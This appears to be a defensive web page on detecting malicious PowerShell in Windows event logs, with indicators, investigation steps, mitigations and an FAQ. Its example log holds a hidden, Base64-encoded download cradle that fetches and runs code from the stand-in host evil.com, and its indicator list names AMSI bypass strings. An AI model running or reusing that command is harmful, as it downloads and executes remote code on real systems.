Suspicious PowerShell Execution Detection

AttackPatterns Windows Security PowerShell Abuse / Living Off the Land

What This Means

Detect malicious PowerShell execution in Windows event logs. Identify encoded commands, download cradles, AMSI bypasses, and living-off-the-land attack techniques.

Example Log

A new process has been created.
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGUAdgBpAGwALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA==
Creator Process: C:\Windows\System32\cmd.exe
Token Elevation Type: TokenElevationTypeFull (2)

Indicators of Suspicious Activity

Base64-encoded commands (-Enc, -EncodedCommand parameter)
Execution policy bypass flags (-ExecutionPolicy Bypass, -ep bypass)
Hidden window flags (-WindowStyle Hidden, -W Hidden)
Download cradles (Net.WebClient, Invoke-WebRequest, Start-BitsTransfer)
AMSI bypass attempts (Set-MpPreference, [Ref].Assembly)
PowerShell spawned by unexpected parent processes (Word, Excel, WScript)

How to Investigate

Decode Base64-encoded commands to reveal the actual payload
Identify the parent process chain (what launched PowerShell)
Check if the decoded command downloads or executes remote content
Review the user context (Token Elevation Type) for privilege level
Search for corresponding network connections to external URLs
Check Script Block Logging (Event 4104) for the full script content

Recommended Mitigations

Enable PowerShell Script Block Logging and Module Logging via Group Policy
Restrict PowerShell to Constrained Language Mode for non-admin users
Deploy AppLocker or WDAC to control PowerShell execution
Enable and monitor AMSI (Antimalware Scan Interface) for PowerShell
Block PowerShell v2 which bypasses many modern security controls
Implement Just Enough Administration (JEA) for admin PowerShell use

Scan This Log Instantly

Paste a suspicious log line below and get an instant AI-powered security assessment.

0 / 2000

What is 2 + 1?

Need a Full Investigation?

Scan entire log files, detect attack patterns, reconstruct timelines, and generate a full investigation report.

Run Smart Scan

Related Log Types

Related Attack Patterns

Frequently Asked Questions

Why do attackers use PowerShell? ▼

PowerShell is pre-installed on every Windows system, has full access to .NET and Windows APIs, can operate entirely in memory (fileless), and is trusted by most security tools. This makes it the ideal living-off-the-land tool for attackers.

How do I decode a Base64 PowerShell command? ▼

In PowerShell: [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('your_base64_here')). Note that PowerShell uses Unicode (UTF-16LE) encoding, not UTF-8.

What is Script Block Logging? ▼

Script Block Logging (Event 4104) records the full content of every PowerShell script block executed on the system, including dynamically generated and deobfuscated code. It is the single most valuable PowerShell detection control.